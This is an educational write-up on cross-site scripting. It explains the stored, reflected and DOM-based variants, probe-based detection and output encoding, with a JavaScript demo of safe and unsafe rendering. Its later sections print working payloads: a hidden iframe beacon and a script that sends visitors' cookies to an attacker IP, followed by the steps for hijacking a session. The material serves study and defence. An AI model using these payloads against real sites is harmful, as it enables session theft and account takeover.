Cross-site scripting

Well-designed web applications treat user input as untrusted: they validate it on the way in and, more importantly, encode it on the way out so that the browser never interprets it as markup or script. Cross-site scripting (XSS) occurs when user-controlled data is written into a page without that sanitization or encoding, allowing an attacker to inject HTML or JavaScript that other visitors' browsers then execute in the context of the vulnerable site.

There are three variants of cross-site scripting:

  • Stored - occurs when the injected payload is saved on the server (database, file, log) and later rendered into a page. The payload is served to everyone who views that page.

    • Affects all users of the site, not just the attacker

    • Often found in forum software, especially in comment sections or product reviews

  • Reflected - occurs when the payload travels in the request (a URL parameter or a form field) and the server echoes it straight back in the response. Reflected XSS only affects the user who sends that request.

    • Only attacks the person submitting the request or opening the link, so the victim usually has to be lured into clicking an attacker-supplied URL

    • Often occurs in search fields and results pages, and anywhere user input is included in error messages

  • DOM-based - takes place entirely in the browser: client-side JavaScript reads an attacker-controllable source (such as location.hash or document.URL) and writes it into a dangerous sink (innerHTML, document.write, eval) without the payload necessarily ever reaching the server.

    • Occurs when a page's Document Object Model (DOM) is modified with user-controlled content; because a payload carried in the URL fragment is not sent to the server, server-side filtering and server logs will not catch it

All three variants can result in session hijacking, redirection to attacker-controlled sites and arbitrary script execution in the victim's browser.

Detecting

Detection starts with reviewing the application for every place user input is accepted (form fields, URL parameters, and request headers such as User-Agent or Referer that get displayed back) and testing whether those inputs are echoed into a page unmodified. Characters that a sanitizing or encoding layer normally handles, and which are therefore useful probes, include:

< > ' " { } ;

If the application echoes these characters back unchanged (neither removed nor HTML-encoded as &lt;, &quot; and so on), the page may be vulnerable to XSS. Check the raw HTML source of the response rather than the rendered page: the browser displays &lt; and < identically, so only the source shows whether encoding took place.

Basic example

  • We discover a web page that includes a form for users to provide feedback

  • Posting a test message of hello " ; <> shows the input echoed back with no filtering or encoding

  • We then submit a basic payload such as <script>alert('xss')</script>

  • After submitting, the page pops up an alert box, confirming that our input was executed as script

  • Because this user feedback is written to a database and rendered for every visitor, this is a stored XSS vulnerability: all users that visit the page will receive the popup
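The following is an added example, not code from the original notes: a minimal model of the feedback form above, written in JavaScript (Node.js) so the server-side rendering can be run offline. It shows the unencoded concatenation that makes the stored payload fire, the output-encoding fix, and the "Detecting" check (submit the probe string, look for it echoed verbatim) as a function. The function names and the sample comments are constructed for this example.

```javascript
// Added example (not from the original notes): vulnerable vs. encoded rendering
// of stored feedback, plus the probe check from the "Detecting" section.
// Function names (renderFeedbackUnsafe, renderFeedbackSafe, echoesProbeUnchanged)
// are my own; no real application is modelled.

// Characters the notes list as commonly sanitized, plus '&' and '/', which an
// HTML output encoder also has to cover.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Output encoding for HTML text and quoted attribute values. Encoding is
// preferable to stripping: the user's text survives intact, but the browser
// can no longer interpret it as markup.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: each stored comment is concatenated straight into the
// page, so every visitor's browser parses the attacker's markup as part of it.
function renderFeedbackUnsafe(comments) {
  return comments.map((c) => `<li class="feedback">${c}</li>`).join('\n');
}

// Hardened rendering: identical layout, but every comment is encoded on output.
function renderFeedbackSafe(comments) {
  return comments
    .map((c) => `<li class="feedback">${escapeHtml(c)}</li>`)
    .join('\n');
}

// The manual check from "Detecting" as a function: submit a probe containing
// the dangerous characters and look for it echoed back byte-for-byte.
// Returns true when the response contains the probe unencoded, i.e. the page
// is worth following up with a real payload.
function echoesProbeUnchanged(probe, responseHtml) {
  return responseHtml.includes(probe);
}

const PROBE = 'hello " ; <>';
const PAYLOAD = "<script>alert('xss')</script>";

// Constructed sample data: two benign comments plus the attacker's submissions.
const storedComments = ['Great site!', PROBE, PAYLOAD];

// Renders the same stored comments both ways and reports what the probe check
// and a search for the raw payload find in each response.
function detectionDemo() {
  const unsafePage = renderFeedbackUnsafe(storedComments);
  const safePage = renderFeedbackSafe(storedComments);
  return {
    unsafeEchoesProbe: echoesProbeUnchanged(PROBE, unsafePage), // true
    safeEchoesProbe: echoesProbeUnchanged(PROBE, safePage),     // false
    unsafeHasScriptTag: unsafePage.includes(PAYLOAD),           // true
    safeHasScriptTag: safePage.includes(PAYLOAD),               // false
    safePage,
  };
}

console.log(detectionDemo().safePage);
```

Note that the encoded page still contains the attacker's text verbatim when viewed in a browser, which is why the probe check must be run against the HTML source and not the rendered output.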

Injecting content

A more malicious version of this attack injects an invisible iframe into the victim's browser.

<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>

When the victim visits the infected page, their browser silently requests the iframe's source and so connects to the attacking machine (this requires a listener on port 80, e.g. netcat). The incoming request confirms that the payload executed and reveals the victim's IP address and User-Agent; the zero-size frame keeps it invisible to the victim.

Stealing cookies and session information

Cross-site scripting can also be used to steal cookies and session information from site visitors.

<script>new Image().src="http://10.11.0.5/cool.jpg?output="+document.cookie;</script>

When a victim visits the page, their browser requests the image URL from the attacking machine and sends the victim's cookies, including any authenticated session ID, in the query string (a listener on port 80 is required again). This only works for cookies that JavaScript is allowed to read: a session cookie set with the HttpOnly flag is not exposed through document.cookie, which is exactly the attack that flag exists to block.

Once we have the session ID, we can set it in our browser using a tool like the Cookie-Editor extension and browse to the page without providing credentials (assuming the cookie we captured belonged to an authenticated user and the session has not yet expired).
